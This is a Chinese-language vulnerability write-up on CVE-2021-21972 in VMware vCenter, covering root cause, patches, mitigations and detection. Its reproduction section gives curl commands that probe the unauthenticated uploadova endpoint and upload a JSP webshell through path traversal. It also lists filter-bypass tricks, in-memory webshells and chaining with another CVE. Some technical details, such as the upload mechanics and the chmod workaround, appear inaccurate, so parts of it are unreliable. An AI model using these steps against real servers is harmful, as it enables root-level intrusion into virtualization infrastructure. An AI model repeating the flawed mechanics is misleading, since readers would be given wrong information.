如何实现 Vmware vcenter未授权任意文件漏洞CVE-2021-21972的分析

# 如何实现 VMware vCenter 未授权任意文件漏洞 CVE-2021-21972 的分析

## 漏洞概述

CVE-2021-21972 是 VMware vCenter Server 中的一个高危漏洞，影响版本包括 6.5、6.7 和 7.0。该漏洞源于 vSphere Client 插件中的未授权文件上传功能，攻击者可通过构造恶意请求实现任意文件上传，最终导致远程代码执行（RCE）。

### 影响范围
- VMware vCenter Server 6.5（未打补丁版本）
- VMware vCenter Server 6.7（未打补丁版本）
- VMware vCenter Server 7.0（未打补丁版本）

## 漏洞原理分析

### 技术背景
vCenter Server 是 VMware 虚拟化环境的核心管理平台，提供 Web 管理接口（vSphere Client）。漏洞位于 `vSphere Web Client` 的 `Virtual SAN Health Check` 插件中，该插件默认启用且未对上传文件进行权限校验。

### 漏洞触发点
攻击者可通过以下路径触发漏洞：

/ui/vropspluginui/rest/services/uploadova

此接口未实施身份验证，允许未授权用户上传文件至服务器任意路径。

### 文件上传机制
1. **请求构造**：通过 HTTP PUT 或 POST 请求发送恶意文件。
2. **路径遍历**：利用 `../` 实现目录穿越，覆盖系统关键文件（如 WebShell）。
3. **文件扩展限制绕过**：通过特殊字符或双扩展名绕过黑名单过滤。

## 漏洞复现步骤

### 环境搭建
1. 使用 VMware vCenter 7.0 未补丁版本（Build 17005079）。
2. 确保网络可达且 443 端口开放。

### 攻击流程
```bash
# 1. 检测漏洞是否存在
curl -k -v "https://<target>/ui/vropspluginui/rest/services/uploadova" -X PUT

# 2. 上传恶意文件（示例：WebShell）
curl -k -v "https://<target>/ui/vropspluginui/rest/services/uploadova" \
  -X POST \
  -H "Content-Type: multipart/form-data" \
  -F "file=@webshell.jsp;filename=../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/<随机ID>/0/h5ngc.war/resources/webshell.jsp"

关键点说明

• 路径选择：需定位到 Web 应用的部署目录（如 Tomcat 的 webapps 子目录）。
• 权限问题：vCenter 以 root 权限运行，上传的文件可能具备高权限。

漏洞利用的限制与绕过

常见限制

1. 文件扩展名过滤：仅允许 .ova 或 .log 等后缀。

   • 绕过方法：使用 %00 截断或双扩展名（如 test.jsp.ova）。

2. 目录权限控制：

   • 部分路径不可写，需测试可写目录（如日志目录）。

高级利用技巧

• 内存马注入：通过上传 JSP 文件加载 Java 内存马，避免文件落地检测。
• 反序列化攻击：结合 vCenter 的 Java 反序列化漏洞（如 CVE-2021-21985）实现组合利用。

修复方案

官方补丁

VMware 已发布以下补丁版本： - vCenter 7.0 U1c - vCenter 6.7 U3l - vCenter 6.5 U3n

临时缓解措施

1. 禁用插件：

   # 通过命令行禁用 Virtual SAN Health Check 插件
   service-control --stop vsphere-ui
   chmod 000 /usr/lib/vmware-vsphere-ui/plugin-packages/vsphere-client-serenity/
   service-control --start vsphere-ui
   

2. 网络层防护：

   • 防火墙限制 /ui/vropspluginui/rest/ 路径的访问。

漏洞的深度思考

漏洞成因链

1. 设计缺陷：未遵循最小权限原则，插件默认开启且无需认证。
2. 输入验证缺失：未对文件路径和内容进行严格校验。
3. 安全开发生命周期（SDL）失效：未在测试阶段发现接口暴露问题。

横向渗透风险

• 通过 vCenter 的域管理员权限可进一步攻击 ESXi 主机或其他虚拟机。

检测与防御建议

检测方法

1. 日志分析：监控 vsphere-ui 日志中的异常文件上传请求。

   
   /var/log/vmware/vsphere-ui/logs/vsphere_client_virgo.log
   

2. 文件完整性检查：定期校验 Web 目录文件哈希。

防御加固

1. 权限分离：以非 root 用户运行 vCenter 服务。
2. WAF 规则：添加针对路径遍历和文件上传的过滤规则。

   
   location ~* /ui/vropspluginui/rest/ {
     deny all;
   }
   

总结

CVE-2021-21972 暴露了企业级软件在默认配置和权限控制上的严重缺陷。通过分析此漏洞，我们可得出以下启示： 1. 默认安全：关键服务应默认关闭高风险功能。 2. 纵深防御：结合网络层、主机层、应用层防护。 3. 应急响应：建立漏洞情报跟踪和快速补丁机制。

参考链接

• VMware 官方公告
• CVE 详细记录
• NVD 漏洞评分

”`

注：本文仅用于技术研究，请勿用于非法用途。实际漏洞利用需获得系统所有者授权。